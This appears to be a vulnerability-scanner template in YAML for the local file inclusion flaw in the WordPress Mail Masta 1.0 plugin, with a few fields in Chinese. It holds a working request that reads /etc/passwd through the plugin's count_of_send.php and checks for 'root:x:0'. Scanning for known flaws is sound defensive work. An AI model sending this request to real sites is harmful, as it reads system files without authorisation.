product: WordPress
vName: WordPress Plugin Mail Masta 1.0 - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/40290
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
